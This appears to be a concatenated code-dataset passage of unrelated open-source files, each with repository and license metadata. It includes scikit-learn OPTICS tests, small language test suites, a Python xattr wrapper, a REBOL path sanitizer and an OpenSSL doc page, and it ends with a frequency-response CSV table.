@pytest.mark.parametrize("eps", [0.1, 0.3, 0.5])
@pytest.mark.parametrize("min_samples", [3, 10, 20])
def test_dbscan_optics_parity(eps, min_samples):
# Test that OPTICS clustering labels are <= 5% difference of DBSCAN
centers = [[1, 1], [-1, -1], [1, -1]]
X, labels_true = make_blobs(
n_samples=750, centers=centers, cluster_std=0.4, random_state=0
)
# calculate optics with dbscan extract at 0.3 epsilon
op = OPTICS(min_samples=min_samples, cluster_method="dbscan", eps=eps).fit(X)
# calculate dbscan labels
db = DBSCAN(eps=eps, min_samples=min_samples).fit(X)
contingency = contingency_matrix(db.labels_, op.labels_)
agree = min(
np.sum(np.max(contingency, axis=0)), np.sum(np.max(contingency, axis=1))
)
disagree = X.shape[0] - agree
percent_mismatch = np.round((disagree - 1) / X.shape[0], 2)
# verify label mismatch is <= 5% labels
assert percent_mismatch <= 0.05
def test_min_samples_edge_case():
C1 = [[0, 0], [0, 0.1], [0, -0.1]]
C2 = [[10, 10], [10, 9], [10, 11]]
C3 = [[100, 100], [100, 96], [100, 106]]
X = np.vstack((C1, C2, C3))
expected_labels = np.r_[[0] * 3, [1] * 3, [2] * 3]
clust = OPTICS(min_samples=3, max_eps=7, cluster_method="xi", xi=0.04).fit(X)
assert_array_equal(clust.labels_, expected_labels)
expected_labels = np.r_[[0] * 3, [1] * 3, [-1] * 3]
clust = OPTICS(min_samples=3, max_eps=3, cluster_method="xi", xi=0.04).fit(X)
assert_array_equal(clust.labels_, expected_labels)
expected_labels = np.r_[[-1] * 9]
with pytest.warns(UserWarning, match="All reachability values"):
clust = OPTICS(min_samples=4, max_eps=3, cluster_method="xi", xi=0.04).fit(X)
assert_array_equal(clust.labels_, expected_labels)
# try arbitrary minimum sizes
@pytest.mark.parametrize("min_cluster_size", range(2, X.shape[0] // 10, 23))
def test_min_cluster_size(min_cluster_size):
redX = X[::2] # reduce for speed
clust = OPTICS(min_samples=9, min_cluster_size=min_cluster_size).fit(redX)
cluster_sizes = np.bincount(clust.labels_[clust.labels_ != -1])
if cluster_sizes.size:
assert min(cluster_sizes) >= min_cluster_size
# check behaviour is the same when min_cluster_size is a fraction
clust_frac = OPTICS(
min_samples=9, min_cluster_size=min_cluster_size / redX.shape[0]
)
clust_frac.fit(redX)
assert_array_equal(clust.labels_, clust_frac.labels_)
@pytest.mark.parametrize("min_cluster_size", [0, -1, 1.1, 2.2])
def test_min_cluster_size_invalid(min_cluster_size):
clust = OPTICS(min_cluster_size=min_cluster_size)
with pytest.raises(ValueError, match="must be a positive integer or a "):
clust.fit(X)
def test_min_cluster_size_invalid2():
clust = OPTICS(min_cluster_size=len(X) + 1)
with pytest.raises(ValueError, match="must be no greater than the "):
clust.fit(X)
def test_processing_order():
# Ensure that we consider all unprocessed points,
# not only direct neighbors. when picking the next point.
Y = [[0], [10], [-10], [25]]
clust = OPTICS(min_samples=3, max_eps=15).fit(Y)
assert_array_equal(clust.reachability_, [np.inf, 10, 10, 15])
assert_array_equal(clust.core_distances_, [10, 15, np.inf, np.inf])
assert_array_equal(clust.ordering_, [0, 1, 2, 3])
def test_compare_to_ELKI():
# Expected values, computed with (future) ELKI 0.7.5 using:
# java -jar elki.jar cli -dbc.in csv -dbc.filter FixedDBIDsFilter
# -algorithm clustering.optics.OPTICSHeap -optics.minpts 5
# where the FixedDBIDsFilter gives 0-indexed ids.
r1 = [
np.inf,
1.0574896366427478,
0.7587934993548423,
0.7290174038973836,
0.7290174038973836,
0.7290174038973836,
0.6861627576116127,
0.7587934993548423,
0.9280118450166668,
1.1748022534146194,
3.3355455741292257,
0.49618389254482587,
0.2552805046961355,
0.2552805046961355,
0.24944622248445714,
0.24944622248445714,
0.24944622248445714,
0.2552805046961355,
0.2552805046961355,
0.3086779122185853,
4.163024452756142,
1.623152630340929,
0.45315840475822655,
0.25468325192031926,
0.2254004358159971,
0.18765711877083036,
0.1821471333893275,
0.1821471333893275,
0.18765711877083036,
0.18765711877083036,
0.2240202988740153,
1.154337614548715,
1.342604473837069,
1.323308536402633,
0.8607514948648837,
0.27219111215810565,
0.13260875220533205,
0.13260875220533205,
0.09890587675958984,
0.09890587675958984,
0.13548790801634494,
0.1575483940837384,
0.17515137170530226,
0.17575920159442388,
0.27219111215810565,
0.6101447895405373,
1.3189208094864302,
1.323308536402633,
2.2509184159764577,
2.4517810628594527,
3.675977064404973,
3.8264795626020365,
2.9130735341510614,
2.9130735341510614,
2.9130735341510614,
2.9130735341510614,
2.8459300127258036,
2.8459300127258036,
2.8459300127258036,
3.0321982337972537,
]
o1 = [
0,
3,
6,
4,
7,
8,
2,
9,
5,
1,
31,
30,
32,
34,
33,
38,
39,
35,
37,
36,
44,
21,
23,
24,
22,
25,
27,
29,
26,
28,
20,
40,
45,
46,
10,
15,
11,
13,
17,
19,
18,
12,
16,
14,
47,
49,
43,
48,
42,
41,
53,
57,
51,
52,
56,
59,
54,
55,
58,
50,
]
p1 = [
-1,
0,
3,
6,
6,
6,
8,
3,
7,
5,
1,
31,
30,
30,
34,
34,
34,
32,
32,
37,
36,
44,
21,
23,
24,
22,
25,
25,
22,
22,
22,
21,
40,
45,
46,
10,
15,
15,
13,
13,
15,
11,
19,
15,
10,
47,
12,
45,
14,
43,
42,
53,
57,
57,
57,
57,
59,
59,
59,
58,
]
# Tests against known extraction array
# Does NOT work with metric='euclidean', because sklearn euclidean has
# worse numeric precision. 'minkowski' is slower but more accurate.
clust1 = OPTICS(min_samples=5).fit(X)
assert_array_equal(clust1.ordering_, np.array(o1))
assert_array_equal(clust1.predecessor_[clust1.ordering_], np.array(p1))
assert_allclose(clust1.reachability_[clust1.ordering_], np.array(r1))
# ELKI currently does not print the core distances (which are not used much
# in literature, but we can at least ensure to have this consistency:
for i in clust1.ordering_[1:]:
assert clust1.reachability_[i] >= clust1.core_distances_[clust1.predecessor_[i]]
# Expected values, computed with (future) ELKI 0.7.5 using
r2 = [
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
0.27219111215810565,
0.13260875220533205,
0.13260875220533205,
0.09890587675958984,
0.09890587675958984,
0.13548790801634494,
0.1575483940837384,
0.17515137170530226,
0.17575920159442388,
0.27219111215810565,
0.4928068613197889,
np.inf,
0.2666183922512113,
0.18765711877083036,
0.1821471333893275,
0.1821471333893275,
0.1821471333893275,
0.18715928772277457,
0.18765711877083036,
0.18765711877083036,
0.25468325192031926,
np.inf,
0.2552805046961355,
0.2552805046961355,
0.24944622248445714,
0.24944622248445714,
0.24944622248445714,
0.2552805046961355,
0.2552805046961355,
0.3086779122185853,
0.34466409325984865,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
np.inf,
]
o2 = [
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
15,
11,
13,
17,
19,
18,
12,
16,
14,
47,
46,
20,
22,
25,
23,
27,
29,
24,
26,
28,
21,
30,
32,
34,
33,
38,
39,
35,
37,
36,
31,
40,
41,
42,
43,
44,
45,
48,
49,
50,
51,
52,
53,
54,
55,
56,
57,
58,
59,
]
p2 = [
-1,
-1,
-1,
-1,
-1,
-1,
-1,
-1,
-1,
-1,
-1,
10,
15,
15,
13,
13,
15,
11,
19,
15,
10,
47,
-1,
20,
22,
25,
25,
25,
25,
22,
22,
23,
-1,
30,
30,
34,
34,
34,
32,
32,
37,
38,
-1,
-1,
-1,
-1,
-1,
-1,
-1,
-1,
-1,
-1,
-1,
-1,
-1,
-1,
-1,
-1,
-1,
-1,
]
clust2 = OPTICS(min_samples=5, max_eps=0.5).fit(X)
assert_array_equal(clust2.ordering_, np.array(o2))
assert_array_equal(clust2.predecessor_[clust2.ordering_], np.array(p2))
assert_allclose(clust2.reachability_[clust2.ordering_], np.array(r2))
index = np.where(clust1.core_distances_ <= 0.5)[0]
assert_allclose(clust1.core_distances_[index], clust2.core_distances_[index])
def test_wrong_cluster_method():
clust = OPTICS(cluster_method="superfancy")
with pytest.raises(ValueError, match="cluster_method should be one of "):
clust.fit(X)
def test_extract_dbscan():
# testing an easy dbscan case. Not including clusters with different
# densities.
rng = np.random.RandomState(0)
n_points_per_cluster = 20
C1 = [-5, -2] + 0.2 * rng.randn(n_points_per_cluster, 2)
C2 = [4, -1] + 0.2 * rng.randn(n_points_per_cluster, 2)
C3 = [1, 2] + 0.2 * rng.randn(n_points_per_cluster, 2)
C4 = [-2, 3] + 0.2 * rng.randn(n_points_per_cluster, 2)
X = np.vstack((C1, C2, C3, C4))
clust = OPTICS(cluster_method="dbscan", eps=0.5).fit(X)
assert_array_equal(np.sort(np.unique(clust.labels_)), [0, 1, 2, 3])
def test_precomputed_dists():
redX = X[::2]
dists = pairwise_distances(redX, metric="euclidean")
clust1 = OPTICS(min_samples=10, algorithm="brute", metric="precomputed").fit(dists)
clust2 = OPTICS(min_samples=10, algorithm="brute", metric="euclidean").fit(redX)
assert_allclose(clust1.reachability_, clust2.reachability_)
assert_array_equal(clust1.labels_, clust2.labels_)
| Python | 5 | MaiRajborirug/scikit-learn | sklearn/cluster/tests/test_optics.py | [
"BSD-3-Clause"
] |
import "std/test"
test.run("Check numeric separator", fn(assert) {
const num_no_separators = 10000000
const num_with_separators1 = 10_000_000
const num_with_separators2 = 10__000__000
const num_with_separators3 = 10_000_000_
assert.isEq(num_no_separators, num_with_separators1)
assert.isEq(num_no_separators, num_with_separators2)
assert.isEq(num_no_separators, num_with_separators3)
const float_no_separators = 10000.00
const float_with_separators = 10_000.00
assert.isEq(float_no_separators, float_with_separators)
const hex_no_separators = 0xAB12EF58
const hex_with_separators1 = 0xAB_12_EF_58
const hex_with_separators2 = 0x_AB_12_EF_58
assert.isEq(hex_no_separators, hex_with_separators1)
assert.isEq(hex_no_separators, hex_with_separators2)
})
test.run("Test hex literal", fn(assert) {
const dec = 10
const hex = 0x0A
assert.isEq(dec, hex)
})
test.run("Test binary literal", fn(assert) {
const dec = 10
const bin = 0b1010
assert.isEq(dec, bin)
})
test.run("Test octal literal", fn(assert) {
const dec = 10
const oct = 0o12
assert.isEq(dec, oct)
})
| Inform 7 | 4 | lfkeitel/nitrogen | tests/basic/numbers.ni | [
"BSD-3-Clause"
] |
exec("swigtest.start", -1);
checkequal(test("Hello"), "Hello", "test(""Hello"")");
f = new_Foo("Greetings");
checkequal(Foo_str_get(f), "Greetings", "new_Foo(""Greetings"")");
checkequal(Foo_test(f, "Hello"), "Hello", "Foo_test(f)");
delete_Foo(f);
checkequal(Foo_statictest("Hello", 1), "Hello", "Foo_statictest(""Hello"", 1)");
checkequal(test_def("Hello", 1), "Hello", "test_def(""Hello"", 1)");
checkequal(test_def("Hello"), "Hello", "test_def(""Hello"")");
exec("swigtest.quit", -1);
| Scilab | 2 | kyletanyag/LL-Smartcard | cacreader/swig-4.0.2/Examples/test-suite/scilab/varargs_runme.sci | [
"BSD-3-Clause"
] |
[
Three loop bounds: i,j,k live at c0,c1,c2 accordingly. A triple loop runs and
increments the target (at c3).
]
Set i
+++++ +++++ +++++ +++++ +++++
[
Set j for the next iteration of the inner loop
> +++++ +++++ +++++ +++++ +++++ +++++
[
Set k for the next iteration of the innermost loop
> +++++ +++++ +++++ +++++ +++++ +++++ +++++
[ This is the innermost loop
>+< Point to c3; increment it; then point back to c2
-
]
< - Decrement j and check if the inner loop iterates again
]
< - Decrement i and check if outer loop iterates again
]
| Brainfuck | 3 | mikiec84/code-for-blog | 2017/bfjit/bf-programs/nested-loop.bf | [
"Unlicense"
] |
import os
from cffi import FFI
# Workaround for the EON/termux build of Python having os.*xattr removed.
ffi = FFI()
ffi.cdef("""
int setxattr(const char *path, const char *name, const void *value, size_t size, int flags);
ssize_t getxattr(const char *path, const char *name, void *value, size_t size);
ssize_t listxattr(const char *path, char *list, size_t size);
int removexattr(const char *path, const char *name);
""")
libc = ffi.dlopen(None)
def setxattr(path, name, value, flags=0):
path = path.encode()
name = name.encode()
if libc.setxattr(path, name, value, len(value), flags) == -1:
raise OSError(ffi.errno, f"{os.strerror(ffi.errno)}: setxattr({path}, {name}, {value}, {flags})")
def getxattr(path, name, size=128):
path = path.encode()
name = name.encode()
value = ffi.new(f"char[{size}]")
l = libc.getxattr(path, name, value, size)
if l == -1:
# errno 61 means attribute hasn't been set
if ffi.errno == 61:
return None
raise OSError(ffi.errno, f"{os.strerror(ffi.errno)}: getxattr({path}, {name}, {size})")
return ffi.buffer(value)[:l]
def listxattr(path, size=128):
path = path.encode()
attrs = ffi.new(f"char[{size}]")
l = libc.listxattr(path, attrs, size)
if l == -1:
raise OSError(ffi.errno, f"{os.strerror(ffi.errno)}: listxattr({path}, {size})")
# attrs is b'\0' delimited values (so chop off trailing empty item)
return [a.decode() for a in ffi.buffer(attrs)[:l].split(b"\0")[0:-1]]
def removexattr(path, name):
path = path.encode()
name = name.encode()
if libc.removexattr(path, name) == -1:
raise OSError(ffi.errno, f"{os.strerror(ffi.errno)}: removexattr({path}, {name})")
| Python | 4 | Neptos/openpilot | common/xattr.py | [
"MIT"
] |
// @has deprecated/index.html '//*[@class="item-left module-item"]/span[@class="stab deprecated"]' \
// 'Deprecated'
// @has - '//*[@class="item-right docblock-short"]' 'Deprecated docs'
// @has deprecated/struct.S.html '//*[@class="stab deprecated"]' \
// 'Deprecated since 1.0.0: text'
/// Deprecated docs
#[deprecated(since = "1.0.0", note = "text")]
pub struct S;
// @matches deprecated/index.html '//*[@class="item-right docblock-short"]' '^Docs'
/// Docs
pub struct T;
// @matches deprecated/struct.U.html '//*[@class="stab deprecated"]' \
// 'Deprecated since 1.0.0$'
#[deprecated(since = "1.0.0")]
pub struct U;
// @matches deprecated/struct.V.html '//*[@class="stab deprecated"]' \
// 'Deprecated: text$'
#[deprecated(note = "text")]
pub struct V;
// @matches deprecated/struct.W.html '//*[@class="stab deprecated"]' \
// 'Deprecated$'
#[deprecated]
pub struct W;
// @matches deprecated/struct.X.html '//*[@class="stab deprecated"]' \
// 'Deprecated: shorthand reason$'
#[deprecated = "shorthand reason"]
pub struct X;
| Rust | 4 | mbc-git/rust | src/test/rustdoc/deprecated.rs | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
! Copyright 2016 The Go Authors. All rights reserved.
! Use of this source code is governed by a BSD-style
! license that can be found in the LICENSE file.
function the_answer() result(j) bind(C)
use iso_c_binding, only: c_int
integer(c_int) :: j ! output
j = 42
end function the_answer
| FORTRAN | 4 | Havoc-OS/androidprebuilts_go_linux-x86 | misc/cgo/fortran/answer.f90 | [
"BSD-3-Clause"
] |
table t1 : {A : int, B : string, C : float, D : bool}
fun display (q : sql_query [T1 = [A = int, B = string, C = float, D = bool]] []) =
s <- query q
(fn fs _ => return (Some fs.T1))
None;
return <html><body>
{case s of
None => cdata "Row not found."
| Some s =>
<body>
A: {cdata (show _ s.A)}<br/>
B: {cdata (show _ s.B)}<br/>
C: {cdata (show _ s.C)}<br/>
D: {cdata (show _ s.D)}<br/>
</body>}
</body></html>
fun lookupA (inp : {A : string}) =
display (SELECT * FROM t1 WHERE t1.A = {readError _ inp.A})
fun lookupB (inp : {B : string}) =
display (SELECT * FROM t1 WHERE t1.B = {inp.B})
fun lookupC (inp : {C : string}) =
display (SELECT * FROM t1 WHERE t1.C = {readError _ inp.C})
fun lookupD (inp : {D : string}) =
display (SELECT * FROM t1 WHERE t1.D = {readError _ inp.D})
fun main () : transaction page = return <html><body>
<lform>
A: <textbox{#A}/>
<submit action={lookupA}/>
</lform>
<lform>
B: <textbox{#B}/>
<submit action={lookupB}/>
</lform>
<lform>
C: <textbox{#C}/>
<submit action={lookupC}/>
</lform>
<lform>
D: <textbox{#D}/>
<submit action={lookupD}/>
</lform>
</body></html>
| UrWeb | 4 | apple314159/urweb | tests/pquery.ur | [
"BSD-3-Clause"
] |
REBOL [
Title: "secure-clean-path"
File: %secure-clean-path.r
Date: 19-Sep-2002
Version: 1.0.1
Author: ["Brian Hawley" "Anton Rolls"]
Rights: {
Copyright (C) Brian Hawley and Anton Rolls 2002. License for
redistribution, use and modification is granted only if this
copyright notice is included, and does not in any way confer
ownership. It is requested, but not required, that the authors
be notified of any use or modification, for quality-control
purposes.
}
Purpose: {Cleans up parent markers in a path, whilst restricting the output to a sandbox directory}
]
;-- (Nenad Rakocevic)
;-- script trimmed down to the function only
;-- most of comments and unit tests removed
;-- minor changes in the function body ("/" factorized, index? replaced by offset?)
;--
;-- Full script can be found here: http://www.rebol.org/view-script.r?script=secure-clean-path.r
secure-clean-path: func [
target [any-string!] {The path to be cleaned}
/limit {Limit paths relative to this root}
root [any-string!] {The root path (Default "", not applied if "")}
/nocopy {Modify target instead of copy}
/local root-rule a b c slash dot
] [
dot: "."
slash: "/"
unless nocopy [target: at copy head target index? target]
root-rule: either all [root not empty? root] [
either #"/" = pick root length? root [root] [[root slash]]
] [
[slash | none]
]
if parse/all target [
root-rule limit:
any [
a: dot [slash | end] (remove/part a 2) :a |
a: some slash b: (remove/part a b) :a |
a: some dot b: [slash | end] c: (
loop (offset? a b) - 1 [
either all [
b: find/reverse back a slash
-1 <= offset? limit b
] [a: next b] [a: limit break]
]
) :a (
remove/part a c
) |
thru slash
] to end
] [target]
]
| R | 4 | 0xflotus/red | system/utils/secure-clean-path.r | [
"BSL-1.0",
"BSD-3-Clause"
] |
lexer grammar t056lexer12;
options {language=JavaScript;}
B : x='a' x='b' ;
| G-code | 3 | DanielMabadeje/Artificial-Intelligence-Deep-Learning-Machine-Learning-Tutorials | java/java2py/antlr-3.1.3/runtime/JavaScript/tests/functional/t056lexer12.g | [
"Apache-2.0"
] |
=pod
=head1 NAME
ossl_random_add_conf_module - internal random configuration module
=head1 SYNOPSIS
#include "crypto/rand.h"
/* Configuration */
void ossl_random_add_conf_module(void);
=head1 DESCRIPTION
ossl_random_add_conf_module() adds the random configuration module
for providers.
This allows the type and parameters of the stardard setup of random number
generators to be configured with an OpenSSL L<config(5)> file.
=head1 RETURN VALUES
ossl_random_add_conf_module() doesn't return any value.
=head1 SEE ALSO
L<OSSL_PROVIDER(3)>, L<ossl_provider_new(3)>, L<provider-rand(7)>
=head1 HISTORY
The functions described here were all added in OpenSSL 3.0.
=head1 COPYRIGHT
Copyright 2020 The OpenSSL Project Authors. All Rights Reserved.
Licensed under the Apache License 2.0 (the "License"). You may not use
this file except in compliance with the License. You can obtain a copy
in the file LICENSE in the source distribution or at
L<https://www.openssl.org/source/license.html>.
=cut
| Pod | 4 | pmesnier/openssl | doc/internal/man3/ossl_random_add_conf_module.pod | [
"Apache-2.0"
] |
frequency,raw
20.00,-4.24
20.20,-4.17
20.40,-4.09
20.61,-4.03
20.81,-3.95
21.02,-3.89
21.23,-3.84
21.44,-3.80
21.66,-3.76
21.87,-3.73
22.09,-3.69
22.31,-3.67
22.54,-3.65
22.76,-3.63
22.99,-3.63
23.22,-3.61
23.45,-3.60
23.69,-3.60
23.92,-3.60
24.16,-3.59
24.40,-3.59
24.65,-3.61
24.89,-3.62
25.14,-3.63
25.39,-3.63
25.65,-3.64
25.91,-3.65
26.16,-3.66
26.43,-3.66
26.69,-3.67
26.96,-3.67
27.23,-3.67
27.50,-3.68
27.77,-3.69
28.05,-3.69
28.33,-3.70
28.62,-3.70
28.90,-3.70
29.19,-3.71
29.48,-3.70
29.78,-3.71
30.08,-3.71
30.38,-3.71
30.68,-3.70
30.99,-3.70
31.30,-3.69
31.61,-3.68
31.93,-3.67
32.24,-3.67
32.57,-3.66
32.89,-3.64
33.22,-3.64
33.55,-3.62
33.89,-3.62
34.23,-3.61
34.57,-3.60
34.92,-3.60
35.27,-3.58
35.62,-3.58
35.97,-3.58
36.33,-3.57
36.70,-3.56
37.06,-3.56
37.43,-3.54
37.81,-3.54
38.19,-3.53
38.57,-3.51
38.95,-3.51
39.34,-3.50
39.74,-3.50
40.14,-3.49
40.54,-3.48
40.94,-3.47
41.35,-3.47
41.76,-3.46
42.18,-3.46
42.60,-3.46
43.03,-3.46
43.46,-3.47
43.90,-3.49
44.33,-3.50
44.78,-3.51
45.23,-3.52
45.68,-3.53
46.13,-3.54
46.60,-3.54
47.06,-3.54
47.53,-3.54
48.01,-3.53
48.49,-3.55
48.97,-3.56
49.46,-3.57
49.96,-3.57
50.46,-3.56
50.96,-3.55
51.47,-3.56
51.99,-3.55
52.51,-3.53
53.03,-3.52
53.56,-3.51
54.10,-3.50
54.64,-3.49
55.18,-3.48
55.74,-3.47
56.29,-3.46
56.86,-3.45
57.42,-3.44
58.00,-3.42
58.58,-3.41
59.16,-3.39
59.76,-3.37
60.35,-3.37
60.96,-3.36
61.57,-3.36
62.18,-3.36
62.80,-3.35
63.43,-3.34
64.07,-3.33
64.71,-3.32
65.35,-3.31
66.01,-3.30
66.67,-3.29
67.33,-3.28
68.01,-3.27
68.69,-3.27
69.37,-3.26
70.07,-3.25
70.77,-3.24
71.48,-3.23
72.19,-3.22
72.91,-3.22
73.64,-3.21
74.38,-3.20
75.12,-3.20
75.87,-3.19
76.63,-3.18
77.40,-3.17
78.17,-3.17
78.95,-3.16
79.74,-3.16
80.54,-3.16
81.35,-3.17
82.16,-3.18
82.98,-3.17
83.81,-3.19
84.65,-3.20
85.50,-3.21
86.35,-3.22
87.22,-3.24
88.09,-3.26
88.97,-3.27
89.86,-3.28
90.76,-3.30
91.66,-3.29
92.58,-3.30
93.51,-3.29
94.44,-3.29
95.39,-3.28
96.34,-3.28
97.30,-3.28
98.28,-3.27
99.26,-3.27
100.25,-3.26
101.25,-3.26
102.27,-3.25
103.29,-3.25
104.32,-3.23
105.37,-3.23
106.42,-3.22
107.48,-3.21
108.56,-3.21
109.64,-3.19
110.74,-3.17
111.85,-3.14
112.97,-3.13
114.10,-3.09
115.24,-3.07
116.39,-3.04
117.55,-3.02
118.73,-2.99
119.92,-2.96
121.12,-2.93
122.33,-2.91
123.55,-2.88
124.79,-2.86
126.03,-2.84
127.29,-2.81
128.57,-2.80
129.85,-2.78
131.15,-2.75
132.46,-2.73
133.79,-2.70
135.12,-2.69
136.48,-2.65
137.84,-2.63
139.22,-2.63
140.61,-2.61
142.02,-2.58
143.44,-2.56
144.87,-2.55
146.32,-2.54
147.78,-2.53
149.26,-2.52
150.75,-2.53
152.26,-2.52
153.78,-2.52
155.32,-2.53
156.88,-2.53
158.44,-2.54
160.03,-2.55
161.63,-2.56
163.24,-2.56
164.88,-2.56
166.53,-2.56
168.19,-2.56
169.87,-2.56
171.57,-2.56
173.29,-2.55
175.02,-2.55
176.77,-2.56
178.54,-2.56
180.32,-2.54
182.13,-2.53
183.95,-2.52
185.79,-2.51
187.65,-2.51
189.52,-2.50
191.42,-2.49
193.33,-2.48
195.27,-2.47
197.22,-2.47
199.19,-2.47
201.18,-2.45
203.19,-2.44
205.23,-2.44
207.28,-2.41
209.35,-2.41
211.44,-2.40
213.56,-2.38
215.69,-2.36
217.85,-2.35
220.03,-2.33
222.23,-2.32
224.45,-2.28
226.70,-2.26
228.96,-2.24
231.25,-2.21
233.57,-2.19
235.90,-2.17
238.26,-2.15
240.64,-2.12
243.05,-2.09
245.48,-2.06
247.93,-2.03
250.41,-2.02
252.92,-1.98
255.45,-1.95
258.00,-1.93
260.58,-1.91
263.19,-1.88
265.82,-1.86
268.48,-1.83
271.16,-1.81
273.87,-1.79
276.61,-1.77
279.38,-1.75
282.17,-1.73
284.99,-1.70
287.84,-1.68
290.72,-1.64
293.63,-1.62
296.57,-1.58
299.53,-1.56
302.53,-1.55
305.55,-1.51
308.61,-1.50
311.69,-1.47
314.81,-1.43
317.96,-1.42
321.14,-1.40
324.35,-1.39
327.59,-1.36
330.87,-1.34
334.18,-1.32
337.52,-1.29
340.90,-1.26
344.30,-1.23
347.75,-1.21
351.23,-1.18
354.74,-1.15
358.28,-1.11
361.87,-1.08
365.49,-1.05
369.14,-1.03
372.83,-1.01
376.56,-1.00
380.33,-0.96
384.13,-0.95
387.97,-0.94
391.85,-0.93
395.77,-0.91
399.73,-0.91
403.72,-0.90
407.76,-0.89
411.84,-0.88
415.96,-0.87
420.12,-0.87
424.32,-0.86
428.56,-0.85
432.85,-0.84
437.18,-0.83
441.55,-0.80
445.96,-0.79
450.42,-0.78
454.93,-0.76
459.48,-0.75
464.07,-0.74
468.71,-0.72
473.40,-0.73
478.13,-0.72
482.91,-0.73
487.74,-0.73
492.62,-0.74
497.55,-0.75
502.52,-0.75
507.55,-0.76
512.62,-0.75
517.75,-0.74
522.93,-0.73
528.16,-0.72
533.44,-0.69
538.77,-0.67
544.16,-0.64
549.60,-0.61
555.10,-0.59
560.65,-0.56
566.25,-0.52
571.92,-0.51
577.64,-0.50
583.41,-0.48
589.25,-0.46
595.14,-0.45
601.09,-0.45
607.10,-0.44
613.17,-0.42
619.30,-0.41
625.50,-0.41
631.75,-0.40
638.07,-0.39
644.45,-0.38
650.89,-0.36
657.40,-0.34
663.98,-0.31
670.62,-0.29
677.32,-0.26
684.10,-0.22
690.94,-0.17
697.85,-0.13
704.83,-0.09
711.87,-0.05
718.99,-0.01
726.18,0.03
733.44,0.06
740.78,0.10
748.19,0.12
755.67,0.13
763.23,0.13
770.86,0.13
778.57,0.13
786.35,0.13
794.22,0.11
802.16,0.10
810.18,0.09
818.28,0.08
826.46,0.08
834.73,0.07
843.08,0.07
851.51,0.07
860.02,0.08
868.62,0.08
877.31,0.08
886.08,0.09
894.94,0.10
903.89,0.10
912.93,0.10
922.06,0.11
931.28,0.10
940.59,0.09
950.00,0.09
959.50,0.09
969.09,0.09
978.78,0.09
988.57,0.09
998.46,0.10
1008.44,0.12
1018.53,0.15
1028.71,0.18
1039.00,0.22
1049.39,0.25
1059.88,0.29
1070.48,0.33
1081.19,0.38
1092.00,0.43
1102.92,0.49
1113.95,0.54
1125.09,0.61
1136.34,0.67
1147.70,0.75
1159.18,0.81
1170.77,0.86
1182.48,0.93
1194.30,0.98
1206.25,1.03
1218.31,1.09
1230.49,1.13
1242.80,1.17
1255.22,1.21
1267.78,1.25
1280.45,1.29
1293.26,1.34
1306.19,1.37
1319.25,1.41
1332.45,1.45
1345.77,1.50
1359.23,1.55
1372.82,1.62
1386.55,1.67
1400.41,1.72
1414.42,1.78
1428.56,1.85
1442.85,1.90
1457.28,1.96
1471.85,2.02
1486.57,2.07
1501.43,2.14
1516.45,2.21
1531.61,2.28
1546.93,2.35
1562.40,2.43
1578.02,2.51
1593.80,2.57
1609.74,2.66
1625.84,2.76
1642.10,2.86
1658.52,2.97
1675.10,3.07
1691.85,3.17
1708.77,3.28
1725.86,3.39
1743.12,3.51
1760.55,3.63
1778.15,3.76
1795.94,3.88
1813.90,4.02
1832.03,4.16
1850.36,4.32
1868.86,4.47
1887.55,4.63
1906.42,4.79
1925.49,4.98
1944.74,5.16
1964.19,5.36
1983.83,5.56
2003.67,5.77
2023.71,5.96
2043.94,6.16
2064.38,6.36
2085.03,6.54
2105.88,6.74
2126.94,6.92
2148.20,7.11
2169.69,7.29
2191.38,7.46
2213.30,7.62
2235.43,7.79
2257.78,7.94
2280.36,8.07
2303.17,8.21
2326.20,8.34
2349.46,8.48
2372.95,8.60
2396.68,8.72
2420.65,8.83
2444.86,8.95
2469.31,9.06
2494.00,9.18
2518.94,9.29
2544.13,9.39
2569.57,9.48
2595.27,9.58
2621.22,9.68
2647.43,9.76
2673.90,9.84
2700.64,9.90
2727.65,9.95
2754.93,9.98
2782.48,10.00
2810.30,9.98
2838.40,9.95
2866.79,9.89
2895.46,9.83
2924.41,9.74
2953.65,9.64
2983.19,9.54
3013.02,9.41
3043.15,9.27
3073.58,9.12
3104.32,8.97
3135.36,8.82
3166.72,8.69
3198.38,8.54
3230.37,8.40
3262.67,8.25
3295.30,8.11
3328.25,7.96
3361.53,7.80
3395.15,7.63
3429.10,7.46
3463.39,7.27
3498.03,7.11
3533.01,6.95
3568.34,6.79
3604.02,6.63
3640.06,6.48
3676.46,6.34
3713.22,6.21
3750.36,6.08
3787.86,5.96
3825.74,5.86
3864.00,5.78
3902.64,5.71
3941.66,5.65
3981.08,5.56
4020.89,5.45
4061.10,5.31
4101.71,5.18
4142.73,5.03
4184.15,4.87
4226.00,4.70
4268.26,4.53
4310.94,4.33
4354.05,4.15
4397.59,3.97
4441.56,3.79
4485.98,3.62
4530.84,3.46
4576.15,3.30
4621.91,3.17
4668.13,3.05
4714.81,2.93
4761.96,2.84
4809.58,2.75
4857.67,2.66
4906.25,2.57
4955.31,2.49
5004.87,2.43
5054.91,2.40
5105.46,2.39
5156.52,2.41
5208.08,2.45
5260.16,2.52
5312.77,2.61
5365.89,2.72
5419.55,2.84
5473.75,2.99
5528.49,3.17
5583.77,3.38
5639.61,3.64
5696.00,3.89
5752.96,4.15
5810.49,4.41
5868.60,4.63
5927.28,4.84
5986.56,5.02
6046.42,5.15
6106.89,5.24
6167.96,5.29
6229.64,5.31
6291.93,5.29
6354.85,5.24
6418.40,5.17
6482.58,5.07
6547.41,4.94
6612.88,4.77
6679.01,4.57
6745.80,4.36
6813.26,4.15
6881.39,3.93
6950.21,3.71
7019.71,3.48
7089.91,3.25
7160.81,3.00
7232.41,2.74
7304.74,2.49
7377.79,2.27
7451.56,2.07
7526.08,1.90
7601.34,1.78
7677.35,1.72
7754.13,1.72
7831.67,1.79
7909.98,1.93
7989.08,2.12
8068.98,2.38
8149.67,2.71
8231.16,3.08
8313.47,3.54
8396.61,4.05
8480.57,4.60
8565.38,5.16
8651.03,5.72
8737.54,6.25
8824.92,6.74
8913.17,7.16
9002.30,7.52
9092.32,7.75
9183.25,7.87
9275.08,7.87
9367.83,7.76
9461.51,7.51
9556.12,7.12
9651.68,6.58
9748.20,5.94
